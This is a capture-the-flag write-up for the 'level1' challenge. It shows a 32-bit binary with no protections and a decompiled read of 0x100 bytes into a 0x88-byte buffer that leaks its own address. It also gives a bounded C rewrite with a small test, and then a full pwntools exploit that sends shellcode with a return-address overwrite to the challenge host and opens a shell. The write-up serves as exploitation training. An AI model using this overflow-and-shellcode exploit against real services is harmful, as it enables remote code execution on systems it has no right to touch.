level1

0x01 Finding the vulnerability

xfgg@ubuntu:~/Documents$ file level1.80eacdcd51aca92af7749d96efad7fb5 
level1.80eacdcd51aca92af7749d96efad7fb5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 2.6.32, BuildID[sha1]=7d479bd8046d018bbb3829ab97f6196c0238b344, not stripped
xfgg@ubuntu:~/Documents$ checksec level1.80eacdcd51aca92af7749d96efad7fb5
[*] '/home/xfgg/Documents/level1.80eacdcd51aca92af7749d96efad7fb5'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
No protections enabled at all!!!

IDA analysis

int __cdecl main(int argc, const char **argv, const char **envp)
{
    vulnerable_function();
    write(1, "Hello, World!\n", 0xEu);
    return 0;
}

ssize_t vulnerable_function()
{
    char buf; // [esp+0h] [ebp-88h]

    printf("What's this:%p?\n", &buf);
    return read(0, &buf, 0x100u);
}
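The decompiled function above next to a bounded rewrite, as an added example that is not part of the original writeup or the challenge binary. `safe_function` and the pipe-based `feed` helper are assumed names used only to exercise the bounded read without a terminal.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 0x88  /* buf sits at [ebp-88h] in the IDA output */
/* Mirrors the decompiled function: leaks &buf and reads up to 0x100
 * bytes into a 0x88-byte buffer, so 0x78 bytes can land past its end. */
ssize_t vulnerable_function(int fd)
{
    char buf[BUF_SIZE];
    printf("What's this:%p?\n", (void *)buf);
    return read(fd, buf, 0x100);
}

/* Hardened rewrite (assumed name, not from the binary): no address
 * leak and the read is bounded by sizeof buf; the return value keeps
 * read()'s byte count so the caller can still check for errors. */
ssize_t safe_function(int fd)
{
    char buf[BUF_SIZE];
    return read(fd, buf, sizeof buf);
}

/* Test helper (constructed): put n bytes of 'A' into a pipe, let fn
 * consume from its read end, and return how many bytes fn read. */
ssize_t feed(ssize_t (*fn)(int), size_t n)
{
    int fds[2];
    char *data;
    ssize_t w, r;
    if (n > 4096 || pipe(fds) != 0)   /* stay under the pipe's guaranteed capacity */
        return -1;
    data = malloc(n);
    if (data == NULL) { close(fds[0]); close(fds[1]); return -1; }
    memset(data, 'A', n);
    w = write(fds[1], data, n);
    close(fds[1]);                    /* EOF for the reader once the data is drained */
    free(data);
    r = (w == (ssize_t)n) ? fn(fds[0]) : -1;
    close(fds[0]);
    return r;
}

int main(void)
{
    printf("safe_function read %zd of 0x100 bytes\n", feed(safe_function, 0x100));
    return 0;
}
```

Only the bounded version is ever called: with 0x100 bytes on offer it consumes exactly 0x88, the size of the buffer, instead of spilling into the saved registers.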

0x02 Approach

At first I thought this was a write()-based leak with no libc provided.
Then I found there is no system(), so that route goes nowhere; with no protections enabled, write shellcode instead.

exp

from pwn import *

context(arch='i386', os='linux')      # 32-bit target, matches checksec output
p = remote("pwn2.jarvisoj.com", 9877)

# The binary prints "What's this:<addr>?"; the 12-char prefix precedes the hex address
shellcode_addr = p.recvuntil(b'?', drop=True)
shellcode_addr = int(shellcode_addr[12:], 16)

pad = 0x88                            # buf is at ebp-0x88, so 0x88 bytes reach saved ebp
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(pad, b'A') + b"BBBB" + p32(shellcode_addr)  # saved ebp, then return address
p.sendline(payload)
p.interactive()